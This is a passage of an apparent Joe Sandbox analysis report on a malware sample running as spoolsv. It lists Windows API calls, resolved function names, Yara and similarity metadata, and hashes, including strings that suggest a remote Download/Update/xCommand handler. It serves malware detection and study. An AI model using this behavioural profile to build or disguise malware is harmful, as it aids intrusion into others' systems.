                                                                                                        • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00000000,?,005080A8), ref: 00426EBA
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00000000), ref: 00426EEE
                                                                                                        • lstrlen.KERNEL32(?,?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00000000), ref: 00426EFA
                                                                                                        • lstrcpyn.KERNEL32(?,?,?,?,?,?,00000104,?,00000000,?,?,?,?,?,?,?), ref: 00426F23
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                        • String ID: GetLongPathNameA$kernel32.dll
                                                                                                        • API String ID: 3245196872-3214324292
                                                                                                        • Opcode ID: 1e9e5f5c1e60c9c7e11bc2a5435a735d253322c29c089149e56c0a4f5767be2f
                                                                                                        • Instruction ID: 586d1455b15d331b35c2532f7848297220251eb4538b3ec039515ff2587fd6f2
                                                                                                        • Opcode Fuzzy Hash: 1e9e5f5c1e60c9c7e11bc2a5435a735d253322c29c089149e56c0a4f5767be2f
                                                                                                        • Instruction Fuzzy Hash: E3513C71E00129EFCF11DBE8ED85AEFB7B8AF08304F950596A514E7281D7789E44CB68
                                                                                                        APIs
                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0042AD73
                                                                                                        • FindClose.KERNEL32(00000000,00000000,?), ref: 0042AD7E
                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0042AD97
                                                                                                        • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 0042ADA8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileTime$Find$CloseDateFirstLocal
                                                                                                        • String ID:
                                                                                                        • API String ID: 2659516521-0
                                                                                                        • Opcode ID: 473b17c5f252b0e9e729cd0a96b9c16a6b6f39296930207070ea6e7241cc10d3
                                                                                                        • Instruction ID: 10a826d6c87f77ee9b02bc66e20b2e495e265b6b27e8256208fcfbb2e3f103a5
                                                                                                        • Opcode Fuzzy Hash: 473b17c5f252b0e9e729cd0a96b9c16a6b6f39296930207070ea6e7241cc10d3
                                                                                                        • Instruction Fuzzy Hash: 35F01872E0421C66CF50E6E59D85ACFB3AC5F05324F900B97FA14E3191EA389B584755
                                                                                                        APIs
                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0042AD73
                                                                                                        • FindClose.KERNEL32(00000000,00000000,?), ref: 0042AD7E
                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0042AD97
                                                                                                        • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 0042ADA8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileTime$Find$CloseDateFirstLocal
                                                                                                        • String ID:
                                                                                                        • API String ID: 2659516521-0
                                                                                                        • Opcode ID: 4c8514bed77c8f8ef8ecd83c1db9f23a5fd5146bb2be9325bbea4d0af959dd89
                                                                                                        • Instruction ID: 10a826d6c87f77ee9b02bc66e20b2e495e265b6b27e8256208fcfbb2e3f103a5
                                                                                                        • Opcode Fuzzy Hash: 4c8514bed77c8f8ef8ecd83c1db9f23a5fd5146bb2be9325bbea4d0af959dd89
                                                                                                        • Instruction Fuzzy Hash: 35F01872E0421C66CF50E6E59D85ACFB3AC5F05324F900B97FA14E3191EA389B584755
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004CF5D3,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF360
                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004CF378
                                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 004CF38A
                                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 004CF39C
                                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004CF3AE
                                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004CF3C0
                                                                                                        • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004CF3D2
                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 004CF3E4
                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004CF3F6
                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004CF408
                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004CF41A
                                                                                                        • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 004CF42C
                                                                                                        • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 004CF43E
                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 004CF450
                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004CF462
                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 004CF474
                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 004CF486
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                        • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                        • API String ID: 667068680-597814768
                                                                                                        • Opcode ID: 0277385fd50417779046da1c97708c6cf814566de8c970d3c595449e61f88aca
                                                                                                        • Instruction ID: f9718cf08afcb7f2c123aec0f4f78f107bf5674d8a7886d8cd123c748e30e113
                                                                                                        • Opcode Fuzzy Hash: 0277385fd50417779046da1c97708c6cf814566de8c970d3c595449e61f88aca
                                                                                                        • Instruction Fuzzy Hash: 1C31EB74601620ABDB40EFA5E886F2E32A9AB56305BD0057FB400DF365C67DD80CAB5E
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 00430E9D
                                                                                                          • Part of subcall function 00430E68: GetProcAddress.KERNEL32(00000000), ref: 00430E81
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                        • API String ID: 1646373207-1918263038
                                                                                                        • Opcode ID: 07f03f934f66e97b2c45f9c5f993f71570d5753330354a292757c734cf32809f
                                                                                                        • Instruction ID: 5ce11bf3dff7dcbac6806bf9111ba2700e275f1f76bf181bd05fd63e8e9933b9
                                                                                                        • Opcode Fuzzy Hash: 07f03f934f66e97b2c45f9c5f993f71570d5753330354a292757c734cf32809f
                                                                                                        • Instruction Fuzzy Hash: 6C41426268434C5B2744676E75224677BDCD25CB00FA0F72FF004CBBA5CB3DA8459A2D
                                                                                                        APIs
                                                                                                        • FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 00428E78
                                                                                                        • RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 00428E84
                                                                                                        • RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 00428E93
                                                                                                        • RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 00428E9F
                                                                                                        • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00428EB7
                                                                                                        • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 00428EDB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                                                                                        • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                                                        • API String ID: 1416857345-3736581797
                                                                                                        • Opcode ID: a0c4300bfbfce01dba4a9a36cbc53bb4e5be3e048a5ceb691434af11cdb608cb
                                                                                                        • Instruction ID: 0f80b1c64b84514455e222d2f54a119e3207b81848e91510e66230f79eecabad
                                                                                                        • Opcode Fuzzy Hash: a0c4300bfbfce01dba4a9a36cbc53bb4e5be3e048a5ceb691434af11cdb608cb
                                                                                                        • Instruction Fuzzy Hash: 20110A70302325AFE7109F65EC42B6FB7A9EF55710FA1402FF940DB281DEB859408BA8
                                                                                                        APIs
                                                                                                        • FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 00428E78
                                                                                                        • RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 00428E84
                                                                                                        • RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 00428E93
                                                                                                        • RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 00428E9F
                                                                                                        • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00428EB7
                                                                                                        • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 00428EDB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                                                                                        • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                                                        • API String ID: 1416857345-3736581797
                                                                                                        • Opcode ID: a0c4300bfbfce01dba4a9a36cbc53bb4e5be3e048a5ceb691434af11cdb608cb
                                                                                                        • Instruction ID: 0f80b1c64b84514455e222d2f54a119e3207b81848e91510e66230f79eecabad
                                                                                                        • Opcode Fuzzy Hash: a0c4300bfbfce01dba4a9a36cbc53bb4e5be3e048a5ceb691434af11cdb608cb
                                                                                                        • Instruction Fuzzy Hash: 20110A70302325AFE7109F65EC42B6FB7A9EF55710FA1402FF940DB281DEB859408BA8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 8$</Download>$</Update>$</xCommand>$<Download>$<Update>$<xCommand$Param$URL$Version
                                                                                                        • API String ID: 0-954089795
                                                                                                        • Opcode ID: 1181e68c7420e5035b17eaba7e5189add56abfe16e2305f94e673cf54d2d3152
                                                                                                        • Instruction ID: 2d68e6c41ca87c00c381124143961c125374000113fd64c2ef600be50ae681ef
                                                                                                        • Opcode Fuzzy Hash: 1181e68c7420e5035b17eaba7e5189add56abfe16e2305f94e673cf54d2d3152
                                                                                                        • Instruction Fuzzy Hash: 0012ED71900208EFDB14DFE0DE49BDDBBB5BB48305F208179E502BB2A4DB795A49CB58
                                                                                                        APIs
                                                                                                        • GetThreadLocale.KERNEL32(00000000,0042FB77,?,?,00000000,00000000), ref: 0042F8E2
                                                                                                          • Part of subcall function 0042DF2C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Locale$InfoThread
                                                                                                        • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                        • API String ID: 4232894706-2493093252
                                                                                                        • Opcode ID: b85ed9dfc967aef72133f11f1de50f4a52934c066246e20b852cc72a297c83f8
                                                                                                        • Instruction ID: 197d17d46539fea116ba07fa9f83ce9cdf8d1f815eb4acb174e747f36b05566f
                                                                                                        • Opcode Fuzzy Hash: b85ed9dfc967aef72133f11f1de50f4a52934c066246e20b852cc72a297c83f8
                                                                                                        • Instruction Fuzzy Hash: B1617F30B001289BDB00EBB9FD516DE7AB6AB88304FD1907BB101DB346DA3DD949975D
                                                                                                        APIs
                                                                                                        • GetThreadLocale.KERNEL32(00000000,0042FB77,?,?,00000000,00000000), ref: 0042F8E2
                                                                                                          • Part of subcall function 0042DF2C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Locale$InfoThread
                                                                                                        • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                        • API String ID: 4232894706-2493093252
                                                                                                        • Opcode ID: 79201f3f7c0f6db5aab56cbcec8dbd302e1c5a467d6b75af3be145713cf87dc5
                                                                                                        • Instruction ID: 197d17d46539fea116ba07fa9f83ce9cdf8d1f815eb4acb174e747f36b05566f
                                                                                                        • Opcode Fuzzy Hash: 79201f3f7c0f6db5aab56cbcec8dbd302e1c5a467d6b75af3be145713cf87dc5
                                                                                                        • Instruction Fuzzy Hash: B1617F30B001289BDB00EBB9FD516DE7AB6AB88304FD1907BB101DB346DA3DD949975D
                                                                                                        APIs
                                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004321ED
                                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00432209
                                                                                                        • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00432242
                                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004322CE
                                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004322ED
                                                                                                        • VariantCopy.OLEAUT32(?), ref: 00432322
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                        • String ID:
                                                                                                        • API String ID: 351091851-3916222277
                                                                                                        • Opcode ID: 287d018db1ed06f337db09492564644d5890f8cdaa2b2e6e0ed5f9d3aff5ee10
                                                                                                        • Instruction ID: 5b189e654ec2a164cf08ff3fe1fa5bda42d96994a9381aa440632436457c8679
                                                                                                        • Opcode Fuzzy Hash: 287d018db1ed06f337db09492564644d5890f8cdaa2b2e6e0ed5f9d3aff5ee10
                                                                                                        • Instruction Fuzzy Hash: 62510F75A0021D9BCB22DB59CD81BDAB3FCAF4C304F0051DAE609E7211D678AF858F68
                                                                                                        APIs
                                                                                                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E,?,?,?,?,00000002,004253FA,00423BB3,00423BFB), ref: 004252BD
                                                                                                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E,?,?,?,?,00000002,004253FA,00423BB3,00423BFB), ref: 004252C3
                                                                                                        • GetStdHandle.KERNEL32(000000F5,0042530C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E), ref: 004252D8
                                                                                                        • WriteFile.KERNEL32(00000000,000000F5,0042530C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E), ref: 004252DE
                                                                                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004252FC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileHandleWrite$Message
                                                                                                        • String ID: Error$Runtime error at 00000000
                                                                                                        • API String ID: 1570097196-2970929446
                                                                                                        • Opcode ID: dcbf2f3d7b9242d4721900ac582d9b642c1af0b42a895dc0042be7d523733b8f
                                                                                                        • Instruction ID: bba3c48ee625c544525bb5478dd2fe844e83fda31baf9900a2c834fa5eb47d56
                                                                                                        • Opcode Fuzzy Hash: dcbf2f3d7b9242d4721900ac582d9b642c1af0b42a895dc0042be7d523733b8f
                                                                                                        • Instruction Fuzzy Hash: D6F0F660B80B20B5EA20B3A47E0AF9E2E585714B14F90538BB160940E2CAFE54C8D639
                                                                                                        APIs
                                                                                                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E,?,?,?,?,00000002,004253FA,00423BB3,00423BFB), ref: 004252BD
                                                                                                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E,?,?,?,?,00000002,004253FA,00423BB3,00423BFB), ref: 004252C3
                                                                                                        • GetStdHandle.KERNEL32(000000F5,0042530C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E), ref: 004252D8
                                                                                                        • WriteFile.KERNEL32(00000000,000000F5,0042530C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E), ref: 004252DE
                                                                                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004252FC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileHandleWrite$Message
                                                                                                        • String ID: Error$Runtime error at 00000000
                                                                                                        • API String ID: 1570097196-2970929446
                                                                                                        • Opcode ID: dcbf2f3d7b9242d4721900ac582d9b642c1af0b42a895dc0042be7d523733b8f
                                                                                                        • Instruction ID: bba3c48ee625c544525bb5478dd2fe844e83fda31baf9900a2c834fa5eb47d56
                                                                                                        • Opcode Fuzzy Hash: dcbf2f3d7b9242d4721900ac582d9b642c1af0b42a895dc0042be7d523733b8f
                                                                                                        • Instruction Fuzzy Hash: D6F0F660B80B20B5EA20B3A47E0AF9E2E585714B14F90538BB160940E2CAFE54C8D639
                                                                                                        APIs
                                                                                                          • Part of subcall function 0042E498: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0042E4B4
                                                                                                          • Part of subcall function 0042E498: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0042E4D8
                                                                                                          • Part of subcall function 0042E498: GetModuleFileNameA.KERNEL32(500051C6), ref: 0042E4F3
                                                                                                          • Part of subcall function 0042E498: LoadStringA.USER32(00000000,0000FFEA,?,00000100), ref: 0042E597
                                                                                                        • CharToOemA.USER32(?,?), ref: 0042E667
                                                                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E684
                                                                                                        • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E68A
                                                                                                        • GetStdHandle.KERNEL32(000000F4,0042E6F4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E69F
                                                                                                        • WriteFile.KERNEL32(00000000,000000F4,0042E6F4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E6A5
                                                                                                        • LoadStringA.USER32(00000000,0000FFEB,?,00000040), ref: 0042E6C7
                                                                                                        • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0042E6DD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 185507032-0
                                                                                                        • Opcode ID: 401045d8ee95fbdf89e19f6e1ec223ffdeb1ebc428783b2908f96f474aea0da3
                                                                                                        • Instruction ID: f84d6c0ac8f674a6599e0b2749f10f63cfea0163ede0fee5985a43e8fc28d286
                                                                                                        • Opcode Fuzzy Hash: 401045d8ee95fbdf89e19f6e1ec223ffdeb1ebc428783b2908f96f474aea0da3
                                                                                                        • Instruction Fuzzy Hash: 59114FB1205324AAD200EB65EC46F9F77ACAB54704FC0491FB754D60E2DE78D944C76A
                                                                                                        APIs
                                                                                                          • Part of subcall function 0042E498: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0042E4B4
                                                                                                          • Part of subcall function 0042E498: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0042E4D8
                                                                                                          • Part of subcall function 0042E498: GetModuleFileNameA.KERNEL32(500051C6), ref: 0042E4F3
                                                                                                          • Part of subcall function 0042E498: LoadStringA.USER32(00000000,0000FFEA,?,00000100), ref: 0042E597
                                                                                                        • CharToOemA.USER32(?,?), ref: 0042E667
                                                                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E684
                                                                                                        • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E68A
                                                                                                        • GetStdHandle.KERNEL32(000000F4,0042E6F4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E69F
                                                                                                        • WriteFile.KERNEL32(00000000,000000F4,0042E6F4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E6A5
                                                                                                        • LoadStringA.USER32(00000000,0000FFEB,?,00000040), ref: 0042E6C7
                                                                                                        • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0042E6DD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
